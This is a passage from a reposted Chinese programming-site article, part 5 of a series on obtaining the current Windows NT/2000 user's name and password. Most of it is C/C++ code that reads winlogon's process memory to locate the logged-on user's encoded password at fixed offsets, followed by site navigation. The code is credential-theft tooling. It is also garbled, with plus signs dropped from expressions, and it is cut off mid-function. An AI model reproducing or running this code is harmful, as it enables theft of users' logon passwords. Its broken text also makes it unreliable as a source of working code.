获取WinNT/Win2k当前用户名和密码(5)
2008-02-23 05:38:12来源:互联网 阅读 ()
{}
// Format("您的登陆时间为: %d/%d/%d %d:%d:%d\n",
// ARRAYOFCONST((stSystemTime.wMonth, stSystemTime.wDay,
// stSystemTime.wYear, stSystemTime.wHour,
// stSystemTime.wMinute, stSystemTime.wSecond))));
*pdwPwdLen = (pepiEncodedPwdInfo->EncodedPassword.Length
& 0x00ff) / sizeof (wchar_t);
dwHashByte = (pepiEncodedPwdInfo->EncodedPassword.Length
& 0xff00) >> 8;
pvRealPwd = (PVOID)(*pdwWinLogonHeap (dwUserNamePos -
(DWORD)pvWinLogonMem) USER_PASSWORD_OFFSET_WINNT 0x34);
pvPwd = (PVOID)((PBYTE)(dwUserNamePos
USER_PASSWORD_OFFSET_WINNT 0x34));
bRc = TRUE;
}
}
}
HeapFree(GetProcessHeap(), 0, pvEBP);
CloseHandle(hWinLogonHandle);
return (bRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWin2K(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WIN2K 0x400
#define USER_PASSWORD_OFFSET_WIN2K 0x800
HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ, FALSE, dwWinLogonPID);
if(hWinLogonHandle == 0)
return (FALSE);
*pdwPwdLen = 0;
SYSTEM_INFO siSystemInfo;
GetSystemInfo(&siSystemInfo);
DWORD i = (DWORD)siSystemInfo.lpMinimumApplicationAddress;
DWORD dwMaxMemory = (DWORD) siSystemInfo.lpMaximumApplicationAddress;
DWORD dwIncrement = siSystemInfo.dwPageSize;
MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
while(i < dwMaxMemory)
{
if(VirtualQueryEx(hWinLogonHandle, (PVOID)i, &mbiMemoryBasicInfor,
sizeof (MEMORY_BASIC_INFORMATION)))
{
dwIncrement = mbiMemoryBasicInfor.RegionSize;
if (((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
{
PVOID pvRealStartingAddress = HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY, mbiMemoryBasicInfor.RegionSize);
DWORD dwBytesCopied = 0;
if(ReadProcessMemory(hWinLogonHandle, (PVOID)i, pvRealStartingAddress,
mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
{
if((wcscmp((wchar_t *)pvRealStartingAddress, wszUserName) == 0)
&& (wcscmp((wchar_t *)((DWORD)pvRealStartingAddress
USER_DOMAIN_OFFSET_WIN2K), wszUserDomain) == 0))
{
pvRealPwd = (PVOID)(i USER_PASSWORD_OFFSET_WIN2K);
pvPwd = (PVOID)((DWORD)pvRealStartingAddress
USER_PASSWORD_OFFSET_WIN2K);
// Calculate the length of encoded unicode string.
PBYTE pbTemp = (PBYTE)pvPwd;
DWORD dwLoc = (DWORD)pbTemp;
DWORD dwLen = 0;
if((*pbTemp == 0) && (*(PBYTE)((DWORD)pbTemp 1) == 0))
{}
else
do
{
dwLen ;
dwLoc = 2;
pbTemp = (PBYTE) dwLoc;
}while(*pbTemp != 0);
*pdwPwdLen = dwLen;
CloseHandle(hWinLogonHandle);
return (TRUE);
}
}
HeapFree(GetProcessHeap(), 0, pvRealStartingAddress);
}
}
else
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇: 如何把一个网页存为一个单独的mht文档
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
